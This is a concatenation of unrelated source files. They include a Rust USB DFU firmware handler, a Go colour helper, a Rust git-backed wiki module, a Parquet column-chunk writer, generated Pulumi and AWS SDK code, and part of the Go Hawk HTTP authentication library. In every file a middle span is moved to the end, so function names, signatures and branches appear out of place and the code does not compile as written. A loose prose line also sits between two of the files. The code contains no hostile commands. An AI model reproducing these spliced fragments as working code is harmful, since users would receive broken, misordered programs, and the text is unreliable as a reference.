*xfer.request(); if !(req.request_type == control::RequestType::Class && req.recipient == control::Recipient::Interface && req.index == u8::from(self.comm_if) as u16) { return; } fn accept_status<B: UsbBus> (xfer: ControlIn<B>, c: &Dfu<B>, wait_time_ms: u32) { xfer.accept_with(&[ c.status as u8, (wait_time_ms & 0xff) as u8, ((wait_time_ms >> 8) & 0xff) as u8, ((wait_time_ms >> 16) & 0xff) as u8, c.state as u8, 0, ]).ok(); } match self.status { DfuDeviceStatus::Ok => {}, _ => { self.state = DfuState::DfuError; }, } match self.state { DfuState::DfuDnloadBusy => { if !self.awaits_flash { self.state = DfuState::DfuDnloadSync; } }, _ => {}, } match req.request { dfu_request::DFU_UPLOAD if req.value == 0 && req.length > 0 && self.upload_capable => { }, dfu_request::DFU_GETSTATUS if req.value == 0 && req.length == 6 => { match self.state { DfuState::DfuDnloadSync => { if self.awaits_flash { self.state = DfuState::DfuDnloadBusy; } else { self.state = DfuState::DfuDnloadIdle; } self.status = DfuDeviceStatus::Ok; accept_status(xfer, &self, 0); }, DfuState::DfuDnloadBusy => { self.state = DfuState::DfuDnloadSync; accept_status(xfer, &self, 500); }, DfuState::DfuManifest => { if self.manifesting { accept_status(xfer, &self, 500); } else { self.state = DfuState::DfuManifestSync;
}, DfuState::DfuManifestSync => { self.state = DfuState::DfuIdle; accept_status(xfer, &self, 0); }, _ => accept_status(xfer, &self, 0), } }, dfu_request::DFU_GETSTATE if req.value == 0 && req.length == 1 => { xfer.accept_with(&[ self.state as u8 ]).ok(); }, _ => { self.state = DfuState::DfuError; self.status = DfuDeviceStatus::ErrStaledPkt; util::_log_fmt(format_args!("Stalled pkt req: {:?}\r\n", req)); xfer.reject().ok(); }, } } fn control_out<'a>(&mut self, xfer: ControlOut<B>) { let req = *xfer.request(); if !(req.request_type == control::RequestType::Class && req.recipient == control::Recipient::Interface && req.index == u8::from(self.comm_if) as u16) { return; } match req.request { dfu_request::DFU_DNLOAD if self.download_capable => { if req.length > 0 { match self.state { DfuState::DfuIdle | DfuState::DfuDnloadIdle => { unsafe{ flash::unlock_flash(); } let start = self.page_buffer_index; //let len = req.length as usize; let len = xfer.data().len(); let page_size = unsafe { flash::get_flash_pg_size() }; self.page_buffer[start..start+len] .copy_from_slice(&xfer.data()[..len]); self.page_buffer_index = start + len; if self.page_buffer_index == page_size as usize { self.awaits_flash = true; } self.state = DfuState::DfuDnloadSync; xfer.accept().ok(); }, _ => {xfer.reject().ok();}, } } else { self.state = DfuState::DfuManifest; self.manifesting = true; self.awaits_flash = true; xfer.accept().ok(); } }, dfu_request::DFU_CLRSTATUS if req.value == 0 && req.length == 0 => { match self.state { DfuState::DfuError => { self.state = DfuState::DfuIdle; self.status = DfuDeviceStatus::Ok; xfer.accept().ok(); }, _ => {xfer.reject().ok();}, } }, dfu_request::DFU_ABORT if req.value == 0 && req.length == 0 => { match self.state { DfuState::DfuIdle => { self.status = DfuDeviceStatus::Ok; xfer.accept().ok(); }, _ => {xfer.reject().ok();} } }, _ => { self.state = DfuState::DfuError; self.status = DfuDeviceStatus::ErrStaledPkt; xfer.reject().ok(); }, } } }
accept_status(xfer, &self, 0); }
color.go
// The MIT License // // Copyright (c) 2020 Temporal Technologies Inc. All rights reserved. // // Copyright (c) 2020 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package color import ( "github.com/fatih/color" "github.com/urfave/cli/v2" ) const ( FlagColor = "color" ) type ColorOption string const ( Auto ColorOption = "auto" Always ColorOption = "always" Never ColorOption = "never" ) var ( colorGreen = color.New(color.FgGreen).SprintfFunc() colorMagenta = color.New(color.FgMagenta).SprintfFunc() colorRed = color.New(color.FgRed).SprintfFunc() ) func Green(c *cli.Context, format string, a ...interface{}) string
func Magenta(c *cli.Context, format string, a ...interface{}) string { checkColor(c) return colorMagenta(format, a...) } func Yellow(c *cli.Context, format string, a ...interface{}) string { checkColor(c) return color.YellowString(format, a...) } func Red(c *cli.Context, format string, a ...interface{}) string { checkColor(c) return colorRed(format, a...) } func checkColor(c *cli.Context) { colorFlag := c.String(FlagColor) colorVal := ColorOption(colorFlag) switch colorVal { case Always: color.NoColor = false case Never: color.NoColor = true default: // auto // handled by color pkg // tty - color. non-tty - false } }
{ checkColor(c) return colorGreen(format, a...) }
git.rs
pub mod read; pub mod write; pub use read::HistoryEntry; use crate::article::ArticlePath; use git2::Repository; use std::{fs, io::Write, os::unix::prelude::*, path::PathBuf}; use tokio::sync::Mutex; // FIXME: better error messages #[derive(thiserror::Error, Debug)] pub enum Error { #[error("git2 error: {0}")] Git2(#[from] git2::Error), #[error("Could not open or init repository in path {}: {}", path.display(), err)] RepoOpen { path: PathBuf, err: git2::Error }, #[error("Can't create post-receive-hook: {}", _0)] HookCreate(std::io::Error), } impl warp::reject::Reject for Error {} pub struct Repo { path: PathBuf, repo: Mutex<Repository>, } impl Repo { pub fn open_or_init(path: PathBuf, home_page: &str) -> Result<Self, Error> { let repo_path = path.clone(); let repo = match Repository::open_bare(&repo_path) { Err(e) if e.code() == git2::ErrorCode::NotFound => { let repo = Repository::init_bare(&repo_path)?; let article = crate::article::WikiArticle::from_title( crate::article::ArticleTitle::new(home_page.to_owned()), ); write::write_and_commit_file( &repo, None, &write::CommitInfo { path: &article.path, signature: git2::Signature::now("system", "system").unwrap(), msg: "Initial commit", }, "This is the home page of your new wiki. Click on edit to put something here.", )?; let post_receive_hook = askama::Template::render(&crate::templates::PostReceiveHook::new()).unwrap(); let hook_path = path.join("hooks/post-receive"); let ret: Result<(), std::io::Error> = try { let mut file = fs::OpenOptions::new() .mode(0o755) .write(true) .create(true) .open(hook_path)?; file.write(post_receive_hook.as_bytes())?; file.flush()?; }; ret.map_err(Error::HookCreate)?; Ok(repo) } other => other, }; match repo { Ok(repo) => Ok(Self { path, repo: Mutex::new(repo), }), Err(e) => Err(Error::RepoOpen { path, err: e }), } } pub fn read(&self) -> Result<read::ReadOnly, Error> { let repo = Repository::open_bare(&self.path)?; Ok(read::ReadOnly { repo }) } pub async fn write(&self) -> write::RepoLock<'_> { write::RepoLock { repo: self.repo.lock().await, } } } fn repo_head(repo: &Repository) -> Result<Option<git2::Reference<'_>>, git2::Error> { match repo.head() { Ok(head) => Ok(Some(head)), Err(e) if e.code() == git2::ErrorCode::UnbornBranch => Ok(None), Err(e) => Err(e), } } fn get_tree_path<'a>( tree: &'a git2::Tree, path: &ArticlePath, ) -> Result<Option<git2::TreeEntry<'a>>, git2::Error> { match tree.get_path(path.as_ref()) { Ok(ent) => Ok(Some(ent)), Err(e) if e.code() == git2::ErrorCode::NotFound => Ok(None), Err(e) => Err(e), } } fn get_blob_oid<'a>( tree: &'a git2::Tree, tree_path: &ArticlePath, ) -> Result<Option<git2::Oid>, Error> { match get_tree_path(&tree, tree_path)? { Some(ent) if ent.kind() == Some(git2::ObjectType::Blob) => Ok(Some(ent.id())), _ => Ok(None), } } fn
<'a>( repo: &'a Repository, tree: &git2::Tree, path: &ArticlePath, ) -> Result<Option<git2::Blob<'a>>, git2::Error> { let ent = match get_tree_path(tree, path)? { Some(ent) => ent, None => return Ok(None), }; let obj = ent.to_object(repo)?; match obj.into_blob() { Ok(blob) => Ok(Some(blob)), Err(_) => Ok(None), } }
get_as_blob
user.subscription.js
module.exports = { user: { subscribe: (parent, args, { pubsub }) => pubsub.asyncIterator('user created') }
};
column_chunk.rs
use std::collections::HashSet; use std::convert::TryInto; use std::io::Write; use futures::AsyncWrite; use parquet_format_async_temp::thrift::protocol::{ TCompactOutputProtocol, TCompactOutputStreamProtocol, TOutputProtocol, TOutputStreamProtocol, }; use parquet_format_async_temp::{ColumnChunk, ColumnMetaData}; use crate::statistics::serialize_statistics; use crate::FallibleStreamingIterator; use crate::{ compression::Compression, encoding::Encoding, error::{ParquetError, Result}, metadata::ColumnDescriptor, page::{CompressedPage, PageType}, schema::types::{physical_type_to_type, ParquetType}, }; use super::page::{write_page, write_page_async, PageWriteSpec}; use super::statistics::reduce; use super::DynStreamingIterator; pub fn write_column_chunk<'a, W, E>( writer: &mut W, mut offset: u64, descriptor: &ColumnDescriptor, compression: Compression, mut compressed_pages: DynStreamingIterator<'a, CompressedPage, E>, ) -> Result<(ColumnChunk, u64)> where W: Write, ParquetError: From<E>, E: std::error::Error, { // write every page let initial = offset; let mut specs = vec![]; while let Some(compressed_page) = compressed_pages.next()? { let spec = write_page(writer, offset, compressed_page)?; offset += spec.bytes_written; specs.push(spec); } let mut bytes_written = offset - initial; let column_chunk = build_column_chunk(&specs, descriptor, compression)?; // write metadata let mut protocol = TCompactOutputProtocol::new(writer); bytes_written += column_chunk.meta_data.as_ref().unwrap().write_to_out_protocol(&mut protocol)? as u64; protocol.flush()?; Ok((column_chunk, bytes_written)) } pub async fn write_column_chunk_async<W, E>( writer: &mut W, mut offset: u64, descriptor: &ColumnDescriptor, compression: Compression, mut compressed_pages: DynStreamingIterator<'_, CompressedPage, E>, ) -> Result<(ColumnChunk, usize)> where W: AsyncWrite + Unpin + Send, ParquetError: From<E>, E: std::error::Error, { let initial = offset; // write every page let mut specs = vec![]; while let Some(compressed_page) = compressed_pages.next()? { let spec = write_page_async(writer, offset, compressed_page).await?; offset += spec.bytes_written; specs.push(spec); } let mut bytes_written = (offset - initial) as usize; let column_chunk = build_column_chunk(&specs, descriptor, compression)?; // write metadata let mut protocol = TCompactOutputStreamProtocol::new(writer); bytes_written += column_chunk.meta_data.as_ref().unwrap() .write_to_out_stream_protocol(&mut protocol) .await?; protocol.flush().await?; Ok((column_chunk, bytes_written)) } fn build_column_chunk( specs: &[PageWriteSpec], descriptor: &ColumnDescriptor, compression: Compression, ) -> Result<ColumnChunk> { // compute stats to build header at the end of the chunk // SPEC: the total compressed size is the total compressed size of each page + the header size let total_compressed_size = specs .iter() .map(|x| x.header_size as i64 + x.header.compressed_page_size as i64) .sum(); // SPEC: the total compressed size is the total compressed size of each page + the header size let total_uncompressed_size = specs .iter() .map(|x| x.header_size as i64 + x.header.uncompressed_page_size as i64) .sum(); let data_page_offset = specs.first().map(|spec| spec.offset).unwrap_or(0) as i64; let num_values = specs .iter() .map(|spec| { let type_ = spec.header.type_.try_into().unwrap(); match type_ { PageType::DataPage => { spec.header.data_page_header.as_ref().unwrap().num_values as i64 } PageType::DataPageV2 =>
_ => 0, // only data pages contribute } }) .sum(); let encodings = specs .iter() .map(|spec| { let type_ = spec.header.type_.try_into().unwrap(); match type_ { PageType::DataPage => vec![ spec.header.data_page_header.as_ref().unwrap().encoding, Encoding::Rle.into(), ], PageType::DataPageV2 => { vec![ spec.header.data_page_header_v2.as_ref().unwrap().encoding, Encoding::Rle.into(), ] } PageType::DictionaryPage => vec![ spec.header .dictionary_page_header .as_ref() .unwrap() .encoding, ], _ => todo!(), } }) .flatten() .collect::<HashSet<_>>() // unique .into_iter() // to vec .collect(); let statistics = specs.iter().map(|x| &x.statistics).collect::<Vec<_>>(); let statistics = reduce(&statistics)?; let statistics = statistics.map(|x| serialize_statistics(x.as_ref())); let type_ = match descriptor.type_() { ParquetType::PrimitiveType { physical_type, .. } => physical_type_to_type(physical_type).0, _ => { return Err(general_err!( "Trying to write a row group of a non-physical type" )) } }; let metadata = ColumnMetaData { type_, encodings, path_in_schema: descriptor.path_in_schema().to_vec(), codec: compression.into(), num_values, total_uncompressed_size, total_compressed_size, key_value_metadata: None, data_page_offset, index_page_offset: None, dictionary_page_offset: None, statistics, encoding_stats: None, bloom_filter_offset: None, }; Ok(ColumnChunk { file_path: None, // same file for now. file_offset: data_page_offset + total_compressed_size, meta_data: Some(metadata), offset_index_offset: None, offset_index_length: None, column_index_offset: None, column_index_length: None, crypto_metadata: None, encrypted_column_metadata: None, }) }
{ spec.header.data_page_header_v2.as_ref().unwrap().num_values as i64 }
load_balancer.py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import pulumi import pulumi.runtime class LoadBalancer(pulumi.CustomResource): """ Manages a V2 loadbalancer resource within OpenStack. """
"""Create a LoadBalancer resource with the given unique name, props, and options.""" if not __name__: raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(__name__, basestring): raise TypeError('Expected resource name to be a string') if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict() if admin_state_up and not isinstance(admin_state_up, bool): raise TypeError('Expected property admin_state_up to be a bool') __self__.admin_state_up = admin_state_up """ The administrative state of the Loadbalancer. A valid value is true (UP) or false (DOWN). """ __props__['adminStateUp'] = admin_state_up if description and not isinstance(description, basestring): raise TypeError('Expected property description to be a basestring') __self__.description = description """ Human-readable description for the Loadbalancer. """ __props__['description'] = description if flavor and not isinstance(flavor, basestring): raise TypeError('Expected property flavor to be a basestring') __self__.flavor = flavor """ The UUID of a flavor. Changing this creates a new loadbalancer. """ __props__['flavor'] = flavor if loadbalancer_provider and not isinstance(loadbalancer_provider, basestring): raise TypeError('Expected property loadbalancer_provider to be a basestring') __self__.loadbalancer_provider = loadbalancer_provider """ The name of the provider. Changing this creates a new loadbalancer. """ __props__['loadbalancerProvider'] = loadbalancer_provider if name and not isinstance(name, basestring): raise TypeError('Expected property name to be a basestring') __self__.name = name """ Human-readable name for the Loadbalancer. Does not have to be unique. """ __props__['name'] = name if region and not isinstance(region, basestring): raise TypeError('Expected property region to be a basestring') __self__.region = region """ The region in which to obtain the V2 Networking client. A Networking client is needed to create an LB member. If omitted, the `region` argument of the provider is used. Changing this creates a new LB member. """ __props__['region'] = region if security_group_ids and not isinstance(security_group_ids, list): raise TypeError('Expected property security_group_ids to be a list') __self__.security_group_ids = security_group_ids """ A list of security group IDs to apply to the loadbalancer. The security groups must be specified by ID and not name (as opposed to how they are configured with the Compute Instance). """ __props__['securityGroupIds'] = security_group_ids if tenant_id and not isinstance(tenant_id, basestring): raise TypeError('Expected property tenant_id to be a basestring') __self__.tenant_id = tenant_id """ Required for admins. The UUID of the tenant who owns the Loadbalancer. Only administrative users can specify a tenant UUID other than their own. Changing this creates a new loadbalancer. """ __props__['tenantId'] = tenant_id if vip_address and not isinstance(vip_address, basestring): raise TypeError('Expected property vip_address to be a basestring') __self__.vip_address = vip_address """ The ip address of the load balancer. Changing this creates a new loadbalancer. 
""" __props__['vipAddress'] = vip_address if not vip_subnet_id: raise TypeError('Missing required property vip_subnet_id') elif not isinstance(vip_subnet_id, basestring): raise TypeError('Expected property vip_subnet_id to be a basestring') __self__.vip_subnet_id = vip_subnet_id """ The network on which to allocate the Loadbalancer's address. A tenant can only create Loadbalancers on networks authorized by policy (e.g. networks that belong to them or networks that are shared). Changing this creates a new loadbalancer. """ __props__['vipSubnetId'] = vip_subnet_id __self__.vip_port_id = pulumi.runtime.UNKNOWN """ The Port ID of the Load Balancer IP. """ super(LoadBalancer, __self__).__init__( 'openstack:loadbalancer/loadBalancer:LoadBalancer', __name__, __props__, __opts__) def set_outputs(self, outs): if 'adminStateUp' in outs: self.admin_state_up = outs['adminStateUp'] if 'description' in outs: self.description = outs['description'] if 'flavor' in outs: self.flavor = outs['flavor'] if 'loadbalancerProvider' in outs: self.loadbalancer_provider = outs['loadbalancerProvider'] if 'name' in outs: self.name = outs['name'] if 'region' in outs: self.region = outs['region'] if 'securityGroupIds' in outs: self.security_group_ids = outs['securityGroupIds'] if 'tenantId' in outs: self.tenant_id = outs['tenantId'] if 'vipAddress' in outs: self.vip_address = outs['vipAddress'] if 'vipPortId' in outs: self.vip_port_id = outs['vipPortId'] if 'vipSubnetId' in outs: self.vip_subnet_id = outs['vipSubnetId']
def __init__(__self__, __name__, __opts__=None, admin_state_up=None, description=None, flavor=None, loadbalancer_provider=None, name=None, region=None, security_group_ids=None, tenant_id=None, vip_address=None, vip_subnet_id=None):
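A hypothetical instantiation based only on the constructor signature above; the resource name and the subnet UUID are placeholders.

# Sketch only: creating the resource with the arguments defined above.
lb = LoadBalancer(
    'lb_1',
    vip_subnet_id='<vip-subnet-uuid>',  # required argument (placeholder value)
    admin_state_up=True,
    description='example loadbalancer')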
api_op_UpdateDirectConnectGatewayAssociation.go
// Code generated by smithy-go-codegen DO NOT EDIT. package directconnect import ( "context" awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware" "github.com/aws/aws-sdk-go-v2/aws/signer/v4" "github.com/aws/aws-sdk-go-v2/service/directconnect/types" "github.com/awslabs/smithy-go/middleware" smithyhttp "github.com/awslabs/smithy-go/transport/http" ) // Updates the specified attributes of the Direct Connect gateway association. Add // or remove prefixes from the association. func (c *Client) UpdateDirectConnectGatewayAssociation(ctx context.Context, params *UpdateDirectConnectGatewayAssociationInput, optFns ...func(*Options)) (*UpdateDirectConnectGatewayAssociationOutput, error) { if params == nil { params = &UpdateDirectConnectGatewayAssociationInput{} } result, metadata, err := c.invokeOperation(ctx, "UpdateDirectConnectGatewayAssociation", params, optFns, addOperationUpdateDirectConnectGatewayAssociationMiddlewares) if err != nil { return nil, err } out := result.(*UpdateDirectConnectGatewayAssociationOutput) out.ResultMetadata = metadata return out, nil } type UpdateDirectConnectGatewayAssociationInput struct { // The Amazon VPC prefixes to advertise to the Direct Connect gateway. AddAllowedPrefixesToDirectConnectGateway []*types.RouteFilterPrefix // The ID of the Direct Connect gateway association. AssociationId *string // The Amazon VPC prefixes to no longer advertise to the Direct Connect gateway. RemoveAllowedPrefixesToDirectConnectGateway []*types.RouteFilterPrefix } type UpdateDirectConnectGatewayAssociationOutput struct { // Information about an association between a Direct Connect gateway and a virtual // private gateway or transit gateway. DirectConnectGatewayAssociation *types.DirectConnectGatewayAssociation // Metadata pertaining to the operation's result. ResultMetadata middleware.Metadata } func addOperationUpdateDirectConnectGatewayAssociationMiddlewares(stack *middleware.Stack, options Options) (err error) { err = stack.Serialize.Add(&awsAwsjson11_serializeOpUpdateDirectConnectGatewayAssociation{}, middleware.After) if err != nil { return err } err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpUpdateDirectConnectGatewayAssociation{}, middleware.After) if err != nil { return err } if err = addSetLoggerMiddleware(stack, options); err != nil { return err } if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil { return err } if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil { return err } if err = addResolveEndpointMiddleware(stack, options); err != nil { return err } if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil { return err } if err = addRetryMiddlewares(stack, options); err != nil { return err } if err = addHTTPSignerV4Middleware(stack, options); err != nil { return err } if err = awsmiddleware.AddAttemptClockSkewMiddleware(stack); err != nil { return err } if err = addClientUserAgent(stack); err != nil
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil { return err } if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil { return err } if err = stack.Initialize.Add(newServiceMetadataMiddleware_opUpdateDirectConnectGatewayAssociation(options.Region), middleware.Before); err != nil { return err } if err = addRequestIDRetrieverMiddleware(stack); err != nil { return err } if err = addResponseErrorMiddleware(stack); err != nil { return err } if err = addRequestResponseLogging(stack, options); err != nil { return err } return nil } func newServiceMetadataMiddleware_opUpdateDirectConnectGatewayAssociation(region string) *awsmiddleware.RegisterServiceMetadata { return &awsmiddleware.RegisterServiceMetadata{ Region: region, ServiceID: ServiceID, SigningName: "directconnect", OperationName: "UpdateDirectConnectGatewayAssociation", } }
{ return err }
hawk.go
// Package hawk implements the Hawk HTTP authentication scheme. package hawk /* import "go.mozilla.org/hawk" */ import ( "bytes" "crypto/hmac" "crypto/rand" "crypto/sha256" "encoding/base64" "fmt" "hash" "io" "net" "net/http" "net/url" "regexp" "strconv" "strings" "time" ) // Now is a func() time.Time that is used by the package to get the current time. var Now = time.Now // MaxTimestampSkew is the maximum ±skew that a request timestamp can have without returning ErrTimestampSkew. var MaxTimestampSkew = time.Minute var ( ErrNoAuth = AuthError("no Authorization header or bewit parameter found") ErrReplay = AuthError("request nonce is being replayed") ErrInvalidMAC = AuthError("invalid MAC") ErrBewitExpired = AuthError("bewit expired") ErrTimestampSkew = AuthError("timestamp skew too high") ErrMissingServerAuth = AuthError("missing Server-Authentication header") ErrInvalidBewitMethod = AuthError("bewit only allows HEAD and GET requests") ) type AuthError string func (e AuthError) Error() string { return "hawk: " + string(e) } type CredentialErrorType int const ( UnknownID CredentialErrorType = iota UnknownApp IDAppMismatch ) func (t CredentialErrorType) String() string { switch t { case UnknownApp: return "unknown app" case IDAppMismatch: return "id/app mismatch" } return "unknown id" } // CredentialError is returned by a CredentialsLookupFunc when the provided credentials // ID is invalid. type CredentialError struct { Type CredentialErrorType Credentials *Credentials } func (e *CredentialError) Error() string { return fmt.Sprintf("hawk: credential error with id %s and app %s: %s", e.Credentials.ID, e.Credentials.App, e.Type) } type Credentials struct { ID string Key string Hash func() hash.Hash // Data may be set in a CredentialsLookupFunc to correlate the credentials // with an internal data record. Data interface{} App string Delegate string } func (creds *Credentials) MAC() hash.Hash { if creds.Hash != nil { return hmac.New(creds.Hash, []byte(creds.Key)) } else { // use a default hash return hmac.New(sha256.New, []byte(creds.Key)) } } type AuthType int const ( AuthHeader AuthType = iota AuthResponse AuthBewit ) func (a AuthType) String() string { switch a { case AuthResponse: return "response" case AuthBewit: return "bewit" default: return "header" } } // A CredentialsLookupFunc is called by NewAuthFromRequest after parsing the // request auth. The Credentials will never be nil and ID will always be set. // App and Delegate will be set if provided in the request. This function must // look up the corresponding Key and Hash and set them on the provided // Credentials. If the Key/Hash are found and the App/Delegate are valid (if // provided) the error should be nil. If the Key or App could not be found or // the App does not match the ID, then a CredentialError must be returned. // Errors will propagate to the caller of NewAuthFromRequest, so internal errors // may be returned. type CredentialsLookupFunc func(*Credentials) error // A NonceCheckFunc is called by NewAuthFromRequest and should make sure that // the provided nonce is unique within the context of the provided time.Time and // Credentials. It should return false if the nonce is being replayed. type NonceCheckFunc func(string, time.Time, *Credentials) bool type AuthFormatError struct { Field string Err string } func (e AuthFormatError) Error() string { return "hawk: invalid " + e.Field + ", " + e.Err } // ParseRequestHeader parses a Hawk header (provided in the Authorization // HTTP header) and populates an Auth. 
If an error is returned it will always be // of type AuthFormatError. func ParseRequestHeader(header string) (*Auth, error) { auth := &Auth{ActualTimestamp: Now()} err := auth.ParseHeader(header, AuthHeader) if err != nil { return nil, err } if auth.Credentials.ID == "" { return nil, AuthFormatError{"id", "missing or empty"} } if auth.Timestamp.IsZero() { return nil, AuthFormatError{"ts", "missing, empty, or zero"} } if auth.Nonce == "" { return nil, AuthFormatError{"nonce", "missing or empty"} } auth.ReqHash = true return auth, nil } // ParseBewit parses a bewit token provided in a URL parameter and populates an // Auth. If an error is returned it will always be of type AuthFormatError. func ParseBewit(bewit string) (*Auth, error) { if len(bewit)%4 != 0 { bewit += strings.Repeat("=", 4-len(bewit)%4) } decoded, err := base64.URLEncoding.DecodeString(bewit) if err != nil { return nil, AuthFormatError{"bewit", "malformed base64 encoding"} } components := bytes.SplitN(decoded, []byte(`\`), 4) if len(components) != 4 { return nil, AuthFormatError{"bewit", "missing components"} } auth := &Auth{ Credentials: Credentials{ID: string(components[0])}, Ext: string(components[3]), Method: "GET", ActualTimestamp: Now(), IsBewit: true, } ts, err := strconv.ParseInt(string(components[1]), 10, 64) if err != nil { return nil, AuthFormatError{"ts", "not an integer"} } auth.Timestamp = time.Unix(ts, 0) auth.MAC = make([]byte, base64.StdEncoding.DecodedLen(len(components[2]))) n, err := base64.StdEncoding.Decode(auth.MAC, components[2]) if err != nil { return nil, AuthFormatError{"mac", "malformed base64 encoding"} } auth.MAC = auth.MAC[:n] return auth, nil } // NewAuthFromRequest parses a request containing an Authorization header or // bewit parameter and populates an Auth. If creds is not nil it will be called // to look up the associated credentials. If nonce is not nil it will be called // to make sure the nonce is not replayed. // // If the request does not contain a bewit or Authorization header, ErrNoAuth is // returned. If the request contains a bewit and it is not a GET or HEAD // request, ErrInvalidBewitMethod is returned. If there is an error parsing the // provided auth details, an AuthFormatError will be returned. If creds returns // an error, it will be returned. If nonce returns false, ErrReplay will be // returned. 
func NewAuthFromRequest(req *http.Request, creds CredentialsLookupFunc, nonce NonceCheckFunc) (*Auth, error) { header := req.Header.Get("Authorization") bewit := req.URL.Query().Get("bewit") var auth *Auth var err error if header != "" { auth, err = ParseRequestHeader(header) if err != nil { return nil, err } } if auth == nil && bewit != "" { if req.Method != "GET" && req.Method != "HEAD" { return nil, ErrInvalidBewitMethod } auth, err = ParseBewit(bewit) if err != nil { return nil, err } } if auth == nil { return nil, ErrNoAuth } auth.Method = req.Method auth.RequestURI = extractRequestURI(req) if bewit != "" { auth.Method = "GET" bewitPattern, _ := regexp.Compile(`\?bewit=` + bewit + `\z|bewit=` + bewit + `&|&bewit=` + bewit + `\z`) auth.RequestURI = bewitPattern.ReplaceAllString(auth.RequestURI, "") } auth.Host, auth.Port = extractReqHostPort(req) if creds != nil { err = creds(&auth.Credentials) if err != nil { return nil, err } } if nonce != nil && !auth.IsBewit && !nonce(auth.Nonce, auth.Timestamp, &auth.Credentials) { return nil, ErrReplay } return auth, nil } func extractReqHostPort(req *http.Request) (host string, port string) { if idx := strings.Index(req.Host, ":"); idx != -1 { host, port, _ = net.SplitHostPort(req.Host) } else { host = req.Host } if req.URL.Host != "" { if idx := strings.Index(req.Host, ":"); idx != -1 { host, port, _ = net.SplitHostPort(req.Host) } else { host = req.URL.Host } } if port == "" { if req.URL.Scheme == "http" {
else { port = "443" } } return } func extractRequestURI(req *http.Request) string { uri := req.URL.Path if req.URL.RawQuery != "" { uri += "?" + req.URL.RawQuery } return uri } // NewRequestAuth builds a client Auth based on req and creds. tsOffset will be // applied to Now when setting the timestamp. func NewRequestAuth(req *http.Request, creds *Credentials, tsOffset time.Duration) *Auth { auth := &Auth{ Method: req.Method, Credentials: *creds, Timestamp: Now().Add(tsOffset), Nonce: nonce(), RequestURI: extractRequestURI(req), } auth.Host, auth.Port = extractReqHostPort(req) return auth } // NewURLAuth builds a client Auth based on uri and creds. tsOffset will be // applied to Now when setting the timestamp. func NewURLAuth(uri string, creds *Credentials, tsOffset time.Duration) (*Auth, error) { u, err := url.Parse(uri) if err != nil { return nil, err } auth := &Auth{ Method: "GET", Credentials: *creds, Timestamp: Now().Add(tsOffset), } if u.Path != "" { // url.Parse unescapes the path, which is unexpected auth.RequestURI = "/" + strings.SplitN(uri[8:], "/", 2)[1] } else { auth.RequestURI = "/" } auth.Host, auth.Port = extractURLHostPort(u) return auth, nil } func extractURLHostPort(u *url.URL) (host string, port string) { if idx := strings.Index(u.Host, ":"); idx != -1 { host, port, _ = net.SplitHostPort(u.Host) } else { host = u.Host } if port == "" { if u.Scheme == "http" { port = "80" } else { port = "443" } } return } func nonce() string { b := make([]byte, 8) _, err := io.ReadFull(rand.Reader, b) if err != nil { panic(err) } return base64.StdEncoding.EncodeToString(b)[:8] } const headerVersion = "1" type Auth struct { Credentials Credentials Method string RequestURI string Host string Port string MAC []byte Nonce string Ext string Hash []byte // ReqHash is true if the request contained a hash ReqHash bool IsBewit bool Timestamp time.Time // ActualTimestamp is when the request was received ActualTimestamp time.Time } // field is of form: key="value" func lexField(r *strings.Reader) (string, string, error) { key := make([]byte, 0, 5) val := make([]byte, 0, 32) // read the key for { ch, _ := r.ReadByte() if ch == '=' { break } if ch < 'a' || ch > 'z' { // fail if not ASCII lowercase letter return "", "", AuthFormatError{"header", "cannot parse header field"} } key = append(key, ch) } if ch, _ := r.ReadByte(); ch != '"' { return "", "", AuthFormatError{string(key), "cannot parse value"} } // read the value for { ch, _ := r.ReadByte() if ch == '"' { break } // character class is ASCII printable [\x20-\x7E] without \ and " if ch < 0x20 || ch > 0x7E || ch == '\\' { return "", "", AuthFormatError{string(key), "cannot parse value"} } val = append(val, ch) } return string(key), string(val), nil } func lexHeader(header string) (map[string]string, error) { params := make(map[string]string, 8) r := strings.NewReader(header) for { ch, eof := r.ReadByte() if eof != nil { break } switch { case ch == ' ' || ch == '\t' || ch == ',': //ignore spaces and commas case ch >= 'a' && ch <= 'z': //beginning of key/value pair like 'id="abcdefg"' r.UnreadByte() key, val, err := lexField(r) if err != nil { return params, err } params[key] = val default: //invalid character encountered return params, AuthFormatError{"header", "cannot parse header"} } } return params, nil } // ParseHeader parses a Hawk request or response header and populates auth. // t must be AuthHeader if the header is an Authorization header from a request // or AuthResponse if the header is a Server-Authorization header from // a response. 
